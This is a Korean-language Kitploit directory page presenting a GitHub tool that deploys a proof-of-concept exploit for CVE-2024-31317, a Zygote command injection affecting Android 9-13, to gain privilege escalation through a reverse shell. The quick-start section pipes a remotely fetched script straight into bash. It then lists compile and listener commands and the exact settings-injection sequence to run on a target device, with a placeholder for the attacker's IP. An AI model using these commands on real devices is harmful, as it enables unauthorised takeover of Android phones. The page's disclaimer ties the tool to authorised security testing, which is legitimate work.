Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-31317-PoC-Deployer — Android 9-13에서 CVE-2024-31317 PoC를 자동 배포하여 Zygote 주입과 리버스 셸 실행을 통한 권한 상승을 가능하게 하는 도구입니다. | Kitploit
도구/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Android SecurityPrivilege EscalationExploitationShellcodePenetration TestingMobile SecurityPayload DevelopmentBinary Exploitation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Android 9-13에서 CVE-2024-31317 PoC를 자동 배포하여 Zygote 주입과 리버스 셸 실행을 통한 권한 상승을 가능하게 하는 도구입니다.

저장소 보기
528671년 전Kitploit 검토 완료

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Android 9~13 기기를 대상으로 하는 CVE-2024-31317 개념 증명(PoC) 악용 코드 배포 도구입니다.

📝 프로젝트 설명

CVE-2024-31317-PoC-Deployer는 CVE-2024-31317 취약점 악용에 필요한 모든 파일을 신속하게 생성하고 구성하는 자동화 배포 스크립트입니다. 이 취약점은 Android 9~13 기기에 영향을 미치며, Zygote 프로세스를 통한 권한 상승 및 임의 코드 실행을 허용합니다.

🚨 취약점 정보

  • CVE ID: CVE-2024-31317
  • 영향 범위: Android 9~13
  • 수정 버전: 2024년 6월 패치 레벨 이상의 Android 버전
  • 취약점 유형: Zygote 프로세스 명령어 주입
  • 필요 권한: WRITE_SECURE_SETTINGS

📦 포함 파일

  • reverse_shell.c - C 언어로 구현된 리버스 셸 프로그램
  • payload.txt - 특수하게 제작된 취약점 악용 페이로드
  • compile.sh - 자동 컴파일 스크립트
  • README.txt - 상세 사용 설명
  • CVE-2024-31317.txt - 취약점 기술 분석 문서

🛠️ 빠른 시작

  1. 원격 배포 스크립트 실행:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. 리버스 셸 컴파일:

    root@kitploit:~
    sh compile.sh
    
  3. 리버스 셸 리스너 실행:

    root@kitploit:~
    sh reverse_shell
    

💣 취약점 악용 단계

  1. payload.txt를 대상 기기의 /data/local/tmp/에 업로드합니다
  2. payload.txt의 xxx.xxx.xxx를 리스너 서버 IP로 교체합니다
  3. 대상 기기에서 다음 명령 시퀀스를 실행합니다:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ 면책 조항

이 도구는 합법적인 보안 테스트 및 연구 목적으로만 사용됩니다. 사용 전에 반드시 대상 시스템의 명시적 승인을 받아야 합니다. 승인되지 않은 사용은 법률을 위반할 수 있습니다. 개발자는 어떠한 오용 행위에 대해서도 책임을 지지 않습니다.

📜 라이선스

이 프로젝트는 MIT 라이선스를 사용합니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.

📚 기술 참고 자료

  • Android Security Bulletin - June 2024
  • CVE-2024-31317 Details
도구 다운로드